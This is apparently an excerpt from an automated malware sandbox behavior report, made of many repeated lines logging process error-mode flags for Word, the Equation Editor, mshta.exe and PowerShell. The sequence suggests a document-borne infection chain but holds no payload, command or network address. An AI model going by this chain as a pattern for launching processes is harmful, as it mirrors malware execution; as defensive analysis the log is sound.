                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
